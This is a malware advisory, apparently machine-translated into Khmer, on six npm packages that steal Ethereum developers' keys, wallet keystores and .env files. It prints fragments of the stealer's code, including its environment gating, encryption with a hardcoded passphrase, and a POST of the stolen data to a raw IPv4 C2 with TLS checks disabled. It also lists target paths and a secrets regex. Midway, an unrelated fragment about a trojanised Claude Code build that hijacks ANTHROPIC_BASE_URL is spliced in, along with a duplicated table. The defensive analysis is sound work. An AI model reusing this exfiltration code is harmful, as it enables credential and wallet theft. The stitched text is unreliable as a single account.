TL; កុង
នៅថ្ងៃទី 6 ខែឧសភា ឆ្នាំ 2026 អ្នកបោះពុម្ពផ្សាយ npm តែមួយ namikazesarada010206បានរុញកញ្ចប់ព្យាបាទចំនួនប្រាំមួយដែលកំណត់គោលដៅប្រព័ន្ធអេកូឡូស៊ីអ្នកអភិវឌ្ឍន៍ Ethereum, Solidity និង DeFi។
កញ្ចប់នានា, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsនិង web3-utils-coreបានប្រើឈ្មោះដែលអាចទុកចិត្តបានដែលត្រូវបានរចនាឡើងដើម្បីមើលទៅដូចជាបណ្ណាល័យជំនួយសម្រាប់ឧបករណ៍ Web3 ដ៏ពេញនិយម។
កញ្ចប់ទាំងប្រាំមួយមានផ្ទុកដូចគ្នា telemetry.js ឯកសារ។ ឯកសារនេះមានទំហំដូចគ្នាបេះបិទនៅទូទាំងចង្កោម ជាមួយ SHA-256៖
មេរោគមិនដំណើរការនៅពេលដំឡើងទេ។ preinstall or postinstall ទំពក់។ ផ្ទុយទៅវិញ វាធ្វើឱ្យសកម្មនៅពេលដែលកញ្ចប់ត្រូវបាននាំចូលតាមរយៈ require().
ព័ត៌មានលម្អិតនោះសំខាន់ណាស់។
ការដាក់បញ្ចូលនេះរង់ចាំរហូតដល់អ្នកអភិវឌ្ឍន៍ពិតជាប្រើប្រាស់កញ្ចប់នេះ។ បន្ទាប់មកវាពិនិត្យមើលថាតើស្ថានីយការងារមើលទៅដូចជាបរិស្ថានអភិវឌ្ឍន៍ Ethereum / Solidity ពិតប្រាកដឬអត់។ វាស្វែងរកកូនសោ Alchemy ឬ Infura កូនសោឯកជន mnemonic កូនសោដាក់ពង្រាយ ឬថត Foundry ក្នុងស្រុក។
ប្រសិនបើម៉ាស៊ីនមេត្រូវគ្នា អ្នកលួចនឹងប្រមូលកូនសោឯកជន SSH ឃ្លាំងកូនសោកាបូប Foundry / Geth / Brownie .env* ឯកសារ និងអថេរបរិស្ថានរសើប។ វាអ៊ិនគ្រីបបាច់ជាមួយ AES-256-GCM ដោយប្រើឃ្លាសម្ងាត់ដែលបានអ៊ិនកូដរឹង ហើយច្រោះវាទៅចំណុចបញ្ចប់ IPv4 C2 ឆៅ ជាមួយនឹងការផ្ទៀងផ្ទាត់ TLS ដែលបានបិទ។
ប្រព័ន្ធព្រមានមុនមេរោគ (MEW) របស់ Xygeni បានបញ្ជាក់ថាកញ្ចប់ទាំងប្រាំមួយជាមេរោគព្យាបាទ។ កញ្ចប់របាយការណ៍ដកចេញការចុះឈ្មោះ npm កំពុងរង់ចាំ។
ចង្កោម៖ កញ្ចប់ចំនួនប្រាំមួយ អ្នកបោះពុម្ពផ្សាយម្នាក់
គណនីអ្នកបោះពុម្ពផ្សាយ namikazesarada010206 ត្រូវបានភ្ជាប់ទៅអាសយដ្ឋាន Gmail ដែលមិនទាន់បានផ្ទៀងផ្ទាត់ namikazesarada010206@gmail.com.
យុទ្ធនាការនេះបានបង្ហាញខ្លួនជាការបោះពុម្ពផ្សាយមួយថ្ងៃនៅថ្ងៃទី 6 ខែឧសភា ឆ្នាំ 2026។ កញ្ចប់ទាំងប្រាំមួយត្រូវបានដាក់កំណែជា 1.0.0មានការពឹងផ្អែកពេលដំណើរការសូន្យ ហើយបានដឹកជញ្ជូនតែឯកសារបីប៉ុណ្ណោះ៖
package.json index.js telemetry.js ពួកគេក៏បានប្រកាសពីឃ្លាំងប្រភពដូចគ្នាផងដែរ៖
https://github.com/harunosakura030303-maker/evmchain-config កញ្ចប់បីដំបូងត្រូវបានចាប់បានដោយម៉ាស៊ីនស្កេន MEW នៅពេលបោះពុម្ពផ្សាយលើកដំបូង។ កញ្ចប់បីដែលនៅសល់ត្រូវបានបង្ខំឱ្យដាក់ទង់បន្ទាប់ពីការពិនិត្យឡើងវិញរបស់អ្នកវិភាគលើទម្រង់ npm របស់អ្នកបោះពុម្ពផ្សាយ។ នៅពេលដែល byte-identical ដូចគ្នា telemetry.js ត្រូវបានបញ្ជាក់នៅទូទាំងចង្កោម ពួកគេត្រូវបានបិទថាជាការព្យាបាទដោយភាពស៊ីសង្វាក់គ្នា។
| កញ្ចប់សមាជិក | កំណែ | បានបោះពុម្ពផ្សាយ npm | សំបុត្រ MEW | លទ្ធភាព |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | ព្យាបាទ |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | ព្យាបាទ |
| ឧបករណ៍ប្រើប្រាស់ស្នូលរឹង | 1.0.0 | 2026-05-06 | #51051 | ព្យាបាទ |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | ព្យាបាទ ដោយភាពស៊ីសង្វាក់គ្នា |
| ឧបករណ៍ប្រើប្រាស់សម្រាប់រោងស្មិត | 1.0.0 | 2026-05-06 | #51071 | ព្យាបាទ ដោយភាពស៊ីសង្វាក់គ្នា |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | ព្យាបាទ ដោយភាពស៊ីសង្វាក់គ្នា |
យុទ្ធសាស្ត្រដាក់ឈ្មោះគឺសាមញ្ញ ប៉ុន្តែមានប្រសិទ្ធភាព។
កញ្ចប់ទាំងនេះមិនក្លែងបន្លំឈ្មោះខាងលើពិតប្រាកដទេ។ ផ្ទុយទៅវិញ ពួកវាប្រើបច្ច័យ "ប្រយោជន៍" ដែលអាចទុកចិត្តបានដូចជា -core, -utilsនិង -utils-coreនោះធ្វើឱ្យពួកវាមើលទៅដូចជាបណ្ណាល័យដៃគូដែលអ្នកអភិវឌ្ឍន៍អាចរំពឹងថានឹងឃើញនៅជិតឧបករណ៍ Web3។
| កញ្ចប់ព្យាបាទ | គោលដៅស្របច្បាប់ |
|---|---|
| viem-core | viem ដែលជាកម្មវិធី Ethereum TypeScript ដ៏ពេញនិយមមួយ |
| viem-utils-core | វីម |
| ឧបករណ៍ប្រើប្រាស់ស្នូលរឹង | hardhat ដែលជាបរិយាកាសអភិវឌ្ឍន៍ Solidity ដ៏សំខាន់មួយ |
| evm-utils | ឈ្មោះឧបករណ៍ EVM ទូទៅ |
| ឧបករណ៍ប្រើប្រាស់សម្រាប់រោងស្មិត | រោងស្មូន ជាខ្សែសង្វាក់ឧបករណ៍ Solidity |
| web3-utils-core | web3-utils, ជំនួយការ Web3.js |
នេះគឺជាគំរូ "កញ្ចប់បន្ថែម"៖ មិនមែន "ខ្ញុំជាកញ្ចប់ពិតប្រាកដ" ទេ ប៉ុន្តែ "ខ្ញុំមើលទៅដូចជាជំនួយការសមហេតុផលនៅជុំវិញកញ្ចប់ពិតប្រាកដ"។
សម្រាប់អ្នកអភិវឌ្ឍន៍ DeFi ដែលមានចលនាយ៉ាងឆាប់រហ័ស នោះគ្រប់គ្រាន់ដើម្បីបង្កើតហានិភ័យ។
តើមានអ្វីកើតឡើងនៅពេលដែលកញ្ចប់ត្រូវបាននាំចូល
ខ្សែសង្វាក់វាយប្រហារមានទំហំតូច មានចេតនា និងផ្តោតលើបរិយាកាសអភិវឌ្ឍន៍គ្រីបតូ។
មិនមានទំពក់ដំឡើងទេ។ ផ្ទុយទៅវិញ កញ្ចប់នីមួយៗរួមបញ្ចូល index.js ដែលនាំចេញមុខងារ stub ហើយបន្ទាប់មកផ្ទុកម៉ូឌុល telemetry ព្យាបាទ។
require('./telemetry').init(); នេះមានន័យថា មេរោគនឹងធ្វើឱ្យសកម្មនៅពេលនាំចូលលើកដំបូង។
នោះមានប្រយោជន៍សម្រាប់ប្រតិបត្តិការសម្រាប់អ្នកវាយប្រហារ។ ម៉ាស៊ីនស្កេន និងប្រអប់ខ្សាច់ជាច្រើនផ្តោតលើឥរិយាបថពេលដំឡើង។ កញ្ចប់នេះរង់ចាំរហូតដល់វាត្រូវបានប្រើប្រាស់ដោយអ្នកអភិវឌ្ឍន៍ ស្គ្រីបសាងសង់ ឈុតសាកល្បង ឬផ្លូវពេលដំណើរការ។
ច្រកទ្វារធ្វើឱ្យសកម្ម៖ បើកដំណើរការតែលើស្ថានីយការងារអ្នកអភិវឌ្ឍន៍ Web3 ពិតប្រាកដប៉ុណ្ណោះ
ផ្នែកសំខាន់បំផុតនៃការផ្សាំគឺច្រកទ្វារធ្វើឱ្យសកម្ម។
មេរោគនេះពិនិត្យមើលអថេរបរិស្ថានដែលមានជាទូទៅនៅលើម៉ាស៊ីនអភិវឌ្ឍន៍ Ethereum / Solidity៖
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); វាក៏ពិនិត្យមើលថាតើ Foundry ហាក់ដូចជាត្រូវបានដំឡើងដែរឬទេ៖
fs.existsSync(path.join(os.homedir(), '.foundry')) ប្រសិនបើលក្ខខណ្ឌទាំងពីរមិនពិតទេ អនុគមន៍នឹងត្រឡប់ ហើយមិនធ្វើអ្វីទាំងអស់។
នោះធ្វើឱ្យកញ្ចប់មានភាពស្ងប់ស្ងាត់ជាងមុននៅក្នុងបរិយាកាសវិភាគទូទៅ។ ប្រអប់ខ្សាច់ដែលគ្មាន Foundry, Alchemy keys, Infura, private keys ឬ mnemonics អាចមើលឃើញការនាំចូលដែលមើលទៅមិនបង្កគ្រោះថ្នាក់។
នៅលើម៉ាស៊ីនមេដែលត្រូវគ្នា មេរោគនឹងរង់ចាំពី 60 ទៅ 90 វិនាទីមុនពេលប្រមូល៖
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ការពន្យារពេលកាត់បន្ថយទំនាក់ទំនងជាក់ស្តែងរវាងការនាំចូល និងការច្រោះចេញ។ .unref() ការហៅក៏អនុញ្ញាតឱ្យដំណើរការម៉ាស៊ីនចាកចេញជាធម្មតា ប្រសិនបើកញ្ចប់ត្រូវបាននាំចូលក្នុងស្គ្រីបដែលមានអាយុកាលខ្លី។
នេះមិនមែនជាឥរិយាបថវាយបំបែកហើយចាប់យកដោយសំឡេងរំខាននោះទេ។ វាគឺជាកម្មវិធីលួចគោលដៅដែលត្រូវបានរចនាឡើងដើម្បីជៀសវាងការដំណើរការ លុះត្រាតែបរិយាកាសអ្នកអភិវឌ្ឍន៍មានតម្លៃក្នុងការលួចពីវា។
អ្វីដែលចោរប្រមូលបាន
នៅពេលដែលច្រកទ្វារធ្វើឱ្យសកម្មឆ្លងកាត់ មេរោគនឹងប្រមូលពីប្រភពដែលសំខាន់បំផុតនៅក្នុងការអភិវឌ្ឍន៍ Web3៖ កូនសោឯកជន ឃ្លាំងកូនសោកាបូប លិខិតសម្គាល់ការដាក់ពង្រាយ អាថ៌កំបាំងពពក ថូខឹន npm និងការកំណត់រចនាសម្ព័ន្ធគម្រោងក្នុងស្រុក។
| ប្រភព | អ្វីដែលត្រូវបានប្រមូល |
|---|---|
| process.env | អថេរណាមួយដែលត្រូវគ្នា /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | ឯកសារដែលមាន PRIVATE KEY ឬ BEGIN OPENSSH រួមទាំងខ្លឹមសារឯកសារពេញលេញ |
| ~/.foundry/keystores/* | ឯកសារឃ្លាំងសោកាបូប Foundry |
| ~/.ethereum/keystore/* | ឯកសារឃ្លាំងសម្ងាត់កាបូប Geth |
| ~/.brownie/accounts/* | ឯកសារឃ្លាំងសោកាបូប Brownie |
| ${cwd}/.env | ខ្លឹមសារឯកសារពេញលេញ |
| ${cwd}/.env.local | ខ្លឹមសារឯកសារពេញលេញ |
| ${cwd}/.env.production | ខ្លឹមសារឯកសារពេញលេញ |
| ${cwd}/.env.development | ខ្លឹមសារឯកសារពេញលេញ |
| ឈ្មោះម៉ាស៊ីន os.() | ទិន្នន័យមេតារបស់ម៉ាស៊ីន |
| crypto.randomUUID() | ឧបករណ៍កំណត់អត្តសញ្ញាណជនរងគ្រោះ/វគ្គ |
| Date.now() | ត្រាពេលវេលាប្រមូល |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ថូខឹន ATTA មានដូចខាងក្រោម៖
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 យើងមិនទាន់អាចបញ្ជាក់បានថាតើទូរមាត្រនេះជាការវិភាគផ្ទាល់ខ្លួនរបស់ប្រតិបត្តិករ ឬជាឆានែលរកប្រាក់ដោយឡែកពីគ្នានោះទេ។ ថូខឹន ATTA គឺដូចគ្នានៅក្នុងគំរូទាំងពីរដែលយើងបានពិនិត្យ។
ចង្កោម B៖ ហៃបៃ
claude.hk ការបន្លំ OAuth + ការលួចចូល ANTHROPIC_BASE_URL
គំរូថ្ងៃទី 1 ខែមេសា គឺជាដៃដំបូងដ៏ឆៅបំផុតនៃយុទ្ធនាការនេះ។
heibai:2.1.88-claude.hk-4 ត្រូវបានបោះពុម្ពផ្សាយដោយ wuguoqiangvip28គណនីមួយដែលបង្កើតឡើងនៅថ្ងៃទី 7 ខែមិថុនា ឆ្នាំ 2025។ កញ្ចប់នេះបានបង្ហាញយ៉ាងច្បាស់អំពីកំណែខ្លួនវាប្រឆាំងនឹងច្បាប់ស្របច្បាប់ 2.1.88 ការដោះលែងមនុស្សធម៌។
វាមិនមានបញ្ហាជាមួយ CA-cert MITM ទេ។ ផ្ទុយទៅវិញ វាកុហកអ្នកប្រើប្រាស់អំពីចំណុចបញ្ចប់ OAuth។
ការបន្ថែមមេរោគព្យាបាទបន្ថែមពីលើប្រភព Claude Code ដែលលេចធ្លាយរួមមាន៖
| ប្រភព | អ្វីដែលត្រូវបានប្រមូល |
|---|---|
| process.env | អថេរណាមួយដែលត្រូវគ្នា /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | ឯកសារដែលមាន PRIVATE KEY ឬ BEGIN OPENSSH រួមទាំងខ្លឹមសារឯកសារពេញលេញ |
| ~/.foundry/keystores/* | ឯកសារឃ្លាំងសោកាបូប Foundry |
| ~/.ethereum/keystore/* | ឯកសារឃ្លាំងសម្ងាត់កាបូប Geth |
| ~/.brownie/accounts/* | ឯកសារឃ្លាំងសោកាបូប Brownie |
| ${cwd}/.env | ខ្លឹមសារឯកសារពេញលេញ |
| ${cwd}/.env.local | ខ្លឹមសារឯកសារពេញលេញ |
| ${cwd}/.env.production | ខ្លឹមសារឯកសារពេញលេញ |
| ${cwd}/.env.development | ខ្លឹមសារឯកសារពេញលេញ |
| ឈ្មោះម៉ាស៊ីន os.() | ទិន្នន័យមេតារបស់ម៉ាស៊ីន |
| crypto.randomUUID() | ឧបករណ៍កំណត់អត្តសញ្ញាណជនរងគ្រោះ/វគ្គ |
| Date.now() | ត្រាពេលវេលាប្រមូល |
បញ្ជីគោលដៅគឺជាក់លាក់ណាស់។ នេះមិនមែនជាការលួចកម្មវិធីរុករកទូទៅ ឬការលួចយកព័ត៌មានសម្ងាត់ទូលំទូលាយនោះទេ។ វាមានគោលបំណងសម្រាប់អ្នកអភិវឌ្ឍន៍ដែលបង្កើត សាកល្បង ដាក់ពង្រាយ ឬដំណើរការកម្មវិធី Ethereum។
ការដាក់បញ្ចូលឃ្លាំងសម្ងាត់ Foundry, Geth និង Brownie គឺមានសារៈសំខាន់ជាពិសេស។ ឯកសារទាំងនេះអាចតំណាងឱ្យការចូលប្រើកាបូប ឬអត្តសញ្ញាណដាក់ពង្រាយដោយផ្ទាល់។ ប្រសិនបើអ្នកវាយប្រហារអាចភ្ជាប់ពួកវាជាមួយពាក្យសម្ងាត់ ម៉ូនីក ឬអាថ៌កំបាំងបរិស្ថាន ពួកគេអាចផ្លាស់ទីមូលនិធិ ធ្វើត្រាប់តាមអ្នកដាក់ពង្រាយ ឬសម្របសម្រួលប្រតិបត្តិការកិច្ចសន្យាឆ្លាតវៃ។
ការអ៊ិនគ្រីបមុនពេលច្រោះចេញ
មេរោគនេះអ៊ិនគ្រីបទិន្នន័យដែលប្រមូលបានមុនពេលផ្ញើវាចេញ។
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); ឃ្លាសម្ងាត់ដែលបានអ៊ិនកូដរឹងគឺ៖
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d payload ចុងក្រោយត្រូវបានរុំជា JSON៖
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} ការអ៊ិនគ្រីបមិនធ្វើឱ្យមេរោគកាន់តែជឿនលឿនដោយខ្លួនឯងទេ។ ទោះជាយ៉ាងណាក៏ដោយ វាធ្វើឱ្យការត្រួតពិនិត្យបណ្តាញកាន់តែពិបាក។ អ្នកការពារដែលមើលការចាកចេញនឹងឃើញ payload JSON ប៉ុន្តែមិនមែនកូនសោរ ឯកសារកាបូបលុយ ឬ .env មាតិកាដោយគ្មានឃ្លាសម្ងាត់ដែលបានអ៊ិនកូដ និងតក្កវិជ្ជាឌិគ្រីប។
ការច្រោះទៅជា Raw IPv4 C2
ផ្លូវច្រោះត្រូវបានអ៊ិនកូដរឹង៖
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); មេរោគផ្ញើទិន្នន័យទៅ៖
https://76.13.37.80:8443/api/v1/telemetry ព័ត៌មានលម្អិតពីរលេចធ្លោ។
ទីមួយ C2 គឺជាអាសយដ្ឋាន IPv4 ឆៅជាជាងដែន។ វាលុបបំបាត់តម្រូវការសម្រាប់ការចុះឈ្មោះដែន និងជៀសវាងការរកឃើញមួយចំនួនដែលមានមូលដ្ឋានលើដែន។
ទីពីរ ការផ្ទៀងផ្ទាត់ TLS ត្រូវបានបិទជាមួយ៖
rejectUnauthorized: false វាអនុញ្ញាតឱ្យមេរោគទទួលយកវិញ្ញាបនបត្រណាមួយ រួមទាំងវិញ្ញាបនបត្រដែលចុះហត្ថលេខាដោយខ្លួនឯង។ ម្យ៉ាងវិញទៀត អ្នកវាយប្រហារទទួលបានការដឹកជញ្ជូនដែលបានអ៊ិនគ្រីបដោយមិនចាំបាច់មានវិញ្ញាបនបត្រសាធារណៈដែលមានសុពលភាព។
គ្មានតក្កវិជ្ជានៃការព្យាយាមឡើងវិញ និងគ្មានម៉ាស៊ីនបម្រុងទុកទេ។ កំហុសត្រូវបានលេបចូលដោយស្ងៀមស្ងាត់។ វារក្សាកញ្ចប់ឱ្យស្ងាត់ ប្រសិនបើ C2 ស្ថិតនៅក្រៅបណ្តាញ ឬមិនអាចទាក់ទងបាន។
ហេតុអ្វីបានជាយុទ្ធនាការនេះសំខាន់
កញ្ចប់ npm ដែលមានគំនិតអាក្រក់ភាគច្រើនមានគោលបំណងអ្នកអភិវឌ្ឍន៍ដេញតាមព័ត៌មានសម្ងាត់ទូលំទូលាយ៖ ថូខឹន npm, កូនសោ AWS, ថូខឹន GitHub ឬ .npmrc ឯកសារ។
យុទ្ធនាការនេះធ្វើឱ្យគោលដៅរួមតូច។
វាស្វែងរកសញ្ញាដែលបង្ហាញថាម៉ាស៊ីននេះជាកម្មសិទ្ធិរបស់អ្នកអភិវឌ្ឍន៍ Ethereum ឬ Solidity។ បន្ទាប់មកវាទាញយកទ្រព្យសកម្មដែលសំខាន់នៅក្នុងបរិយាកាសនោះ៖ ឃ្លាំងសោកាបូប, កូនសោឯកជន, ម៉ូនីកូទិក, កូនសោដាក់ពង្រាយ, .env ឯកសារ និងកូនសោ SSH។
នោះធ្វើឱ្យយុទ្ធនាការនេះមានគ្រោះថ្នាក់ជាងសម្រាប់ក្រុម Web3 ជាងអ្នកលួច npm ទូទៅ។
ការឆ្លងមេរោគដោយជោគជ័យអាចបណ្តាលឱ្យ៖
- កាបូបដាក់ពង្រាយ
- សោអ្នកគ្រប់គ្រងកិច្ចសន្យាឆ្លាតវៃ
- សោអ្នកផ្តល់សេវា RPC
- លិខិតសម្គាល់ការដាក់ពង្រាយលើពពក
- ថូខឹនបោះពុម្ពផ្សាយ npm
- ការចូលប្រើ SSH ទៅកាន់អ្នកអភិវឌ្ឍន៍ ឬហេដ្ឋារចនាសម្ព័ន្ធសាងសង់
- អាថ៌កំបាំងនៃគម្រោងត្រូវបានរក្សាទុកនៅក្នុង
.envឯកសារ - ឃ្លាំងសោកាបូបសម្រាប់ Foundry, Geth ឬ Brownie
ឈ្មោះកញ្ចប់ក៏បង្ហាញពីវិស្វកម្មសង្គមច្បាស់លាស់ផងដែរ។ ពួកវាកំណត់គោលដៅប្រព័ន្ធអេកូឡូស៊ីអ្នកអភិវឌ្ឍន៍ Web3 តាមរយៈឈ្មោះឧបករណ៍ដែលធ្លាប់ស្គាល់៖ viem, hardhat, foundry, evmនិង web3.
តារាសម្តែងមិនចាំបាច់សម្របសម្រួលគម្រោងពិតប្រាកដនោះទេ។ ពួកគេគ្រាន់តែត្រូវការអ្នកអភិវឌ្ឍន៍ដើម្បីដំឡើងអ្វីដែលមើលទៅដូចជាកញ្ចប់ដៃគូសមហេតុផលមួយ។
សូចនាករនៃការសម្របសម្រួល និងការរកឃើញ
| កញ្ចប់ និងអ្នកបោះពុម្ពផ្សាយ | |
|---|---|
| វាល | តម្លៃ |
| អ្នកបោះពុម្ពផ្សាយ npm | ណាមីកាហ្សេសារ៉ាដា០១០២០៦ |
| អ៊ីមែលរបស់អ្នកបោះពុម្ពផ្សាយ | namikazesarada010206@gmail.com |
| បានផ្ទៀងផ្ទាត់អ៊ីមែល | ទេ |
| SCM បានផ្ទៀងផ្ទាត់ | ទេ |
| ពិន្ទុកេរ្តិ៍ឈ្មោះ | 1.0 |
| កញ្ចប់ | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| កំណែ | ទាំងអស់ 1.0.0 |
| ឃ្លាំងប្រភព | https://github.com/harunosakura030303-maker/evmchain-config |
| បានបញ្ជាក់ថាមានគំនិតអាក្រក់ | កញ្ចប់ទាំងប្រាំមួយ |
| Network | |
|---|---|
| វាយបញ្ចូល | តម្លៃ |
| ចំណុចបញ្ចប់ C2 | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| ច្រក C2 | 8443/tcp |
| ឥរិយាបថ TLS | បដិសេធគ្មានការអនុញ្ញាត៖ មិនពិត |
| គ្រោងការណ៍បន្ទុក | {"v":២,"iv": ,"ឃ": "ធ": } |
| ឯកសារ និងហាស | |
|---|---|
| វាយបញ្ចូល | តម្លៃ |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| ប្លង់កញ្ចប់ | package.json, index.js, telemetry.js |
| ចំនួនឯកសារ | 3 |
| ទំហំសរុបប្រហាក់ប្រហែល | 3.4 គីឡូបៃ |
សញ្ញាធ្វើឱ្យសកម្ម
មេរោគពិនិត្យរកអថេរបរិស្ថានទាំងនេះ៖
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY វាក៏ពិនិត្យមើលផងដែរចំពោះ៖
~/.foundry/ ផ្លូវម៉ាស៊ីនគោលដៅ
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development ការប្រមូល Regex
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i កំណត់ចំណាំរកឃើញ
ច្បាប់ជាច្រើនចាប់យុទ្ធនាការនេះដោយមិនចាំបាច់មានការវិភាគអាកប្បកិរិយាពេញលេញនោះទេ។
ដំបូង សូមស្កេនឯកសារចាក់សោសម្រាប់ឈ្មោះកញ្ចប់ព្យាបាទចំនួនប្រាំមួយ៖
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ការប្រកួតណាមួយនៅក្នុង package-lock.json, yarn.lock, pnpm-lock.yamlឬ node_modules ប្រវត្តិសាស្ត្រគួរតែត្រូវបានចាត់ទុកថាជាឧប្បត្តិហេតុធ្ងន់ធ្ងរ។
ទីពីរ តាមដានដំណើរការ Node.js ដែលអានផ្លូវ keystore របស់កាបូប៖
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ នេះកម្រជាឥរិយាបថស្របច្បាប់សម្រាប់កញ្ចប់ដែលបាននាំចូលជាការពឹងផ្អែកជំនួយ។ វាគួរឱ្យសង្ស័យជាពិសេសនៅពេលដែលសកម្មភាពបណ្តាញចេញ។
ទីបី រារាំង ឬជូនដំណឹងលើការតភ្ជាប់ HTTPS ដើម្បី៖
76.13.37.80:8443 ជាពិសេសនៅពេលដែលផ្លូវស្នើសុំគឺ៖
/api/v1/telemetry ទីបួន ស្វែងរកកញ្ចប់ npm ដែលរួមបញ្ចូលគ្នានូវលក្ខណៈទាំងនេះ៖
- អ្នកបោះពុម្ពផ្សាយថ្មី ឬមានកេរ្តិ៍ឈ្មោះទាប
- គណនី Gmail ដែលមិនទាន់បានផ្ទៀងផ្ទាត់
- ឈ្មោះកញ្ចប់ដែលនៅជាប់នឹង Web3
- គ្មានប្រវត្តិឃ្លាំងដែលមានអត្ថន័យទេ
- ប្លង់កញ្ចប់តូច
index.jsដែលផ្ទុកឯកសារទូរមាត្រ ឬឯកសារជំនួយ- គ្មានការពឹងផ្អែកពេលដំណើរការ
- ការប្រមូលអថេរបរិស្ថានងាយប្រតិកម្ម
- ការចូលប្រើឃ្លាំងសោកាបូប
គំរូនេះមានប្រយោជន៍ជាង IOC តែមួយ ពីព្រោះកញ្ចប់បន្ទាប់អាចផ្លាស់ប្តូរអាសយដ្ឋាន IP ប៉ុន្តែរក្សាតក្កវិជ្ជាកំណត់គោលដៅដូចគ្នា។
បញ្ជីត្រួតពិនិត្យការឆ្លើយតបទៅនឹងការសម្របសម្រួល
ប្រសិនបើអ្នកអភិវឌ្ឍន៍ម្នាក់បានប្រើកញ្ចប់មួយក្នុងចំណោមកញ្ចប់ទាំងប្រាំមួយ ហើយបរិស្ថានរបស់ពួកគេត្រូវគ្នានឹងច្រកធ្វើឱ្យសកម្ម សូមចាត់ទុកស្ថានីយការងារថាមានការគំរាមកំហែង។
នោះរួមបញ្ចូលទាំងម៉ាស៊ីនដែលបានដំឡើង Foundry សោ Alchemy ឬ Infura នៅក្នុងបរិស្ថាន សោឯកជន ម៉ូណេម៉ិច ឬសោអ្នកដាក់ពង្រាយ។
ការឆ្លើយតបដែលបានណែនាំ៖
- ផ្តាច់ម៉ាស៊ីនមេចេញពីបណ្តាញ។
- អភិរក្ស។
node_modules, ឯកសារចាក់សោ ប្រវត្តិសែល និងកំណត់ហេតុពាក់ព័ន្ធសម្រាប់កោសល្យវិច្ច័យ។ - បង្វិលគូសោ SSH នីមួយៗនៅក្រោម
~/.ssh/. - បង្វិលសោរកាបូបសម្រាប់ឃ្លាំងសោរនីមួយៗនៅក្រោម
~/.foundry,~/.ethereumនិង~/.brownie. - ផ្ទេរប្រាក់ទៅកាបូបថ្មី។
- បង្វិលរាល់អាថ៌កំបាំងដែលរក្សាទុកក្នុង
.env*ឯកសារនៅក្នុងឃ្លាំងដែលអ្នកអភិវឌ្ឍន៍ធ្វើការ។ - បង្វិលអាថ៌កំបាំងបរិស្ថានដែលត្រូវនឹងសំណុំទិន្នន័យធម្មតា រួមទាំងសោ AWS, ថូខឹន npm, ថូខឹនដាក់ពង្រាយ, សោ API, សោឯកជន, គ្រាប់ពូជ និងម៉ូនីក។
- សវនកម្មសកម្មភាព cloud, npm, GitHub, អ្នកផ្តល់សេវា RPC និង blockchain ចាប់តាំងពីកញ្ចប់ត្រូវបានដំឡើងជាលើកដំបូង។
- កែសម្រួលរូបភាពស្ថានីយការងារឡើងវិញមុនពេលប្រើប្រាស់ឡើងវិញ។
អ្វីដែលអ្នកការពារគួរយក
យុទ្ធនាការនេះបង្ហាញពីរបៀបដែល npm typosquatting កំពុងវិវត្តនៅជុំវិញប្រព័ន្ធអេកូឡូស៊ីអ្នកអភិវឌ្ឍន៍ដែលមានតម្លៃខ្ពស់។
តារាសម្តែងមិនត្រូវការការតស៊ូទេ។ ពួកគេមិនត្រូវការការបិទបាំងទេ។ ពួកគេថែមទាំងមិនត្រូវការការប្រតិបត្តិពេលដំឡើងទៀតផង។
ផ្ទុយទៅវិញ ពួកគេពឹងផ្អែកលើរឿងបីយ៉ាង៖
- ឈ្មោះកញ្ចប់ Web3 ដែលអាចទុកចិត្តបាន
- ការធ្វើឱ្យសកម្មតែលើម៉ាស៊ីនអភិវឌ្ឍន៍គ្រីបតូពិតប្រាកដប៉ុណ្ណោះ
- ការលួចឯកសារ និងអាថ៌កំបាំងដោយផ្ទាល់ដែលសំខាន់បំផុតសម្រាប់អ្នកអភិវឌ្ឍន៍ Ethereum
នោះធ្វើឱ្យយុទ្ធនាការនេះងាយនឹងមើលរំលងក្នុងការស្កេនទូលំទូលាយ និងមានគ្រោះថ្នាក់នៅពេលដែលវាធ្លាក់ចូលទៅក្នុងបរិយាកាសត្រឹមត្រូវ។
សម្រាប់ក្រុម Web3 មេរៀនគឺច្បាស់លាស់៖ ចាត់ទុកឈ្មោះអាស្រ័យជាផ្នែកមួយនៃគំរូគំរាមកំហែងរបស់អ្នក។ កញ្ចប់ដែលមើលទៅដូចជាជំនួយការដែលគ្មានគ្រោះថ្នាក់នៅតែអាចក្លាយជាផ្លូវខ្លីបំផុតទៅកាន់ការសម្របសម្រួលកាបូប។
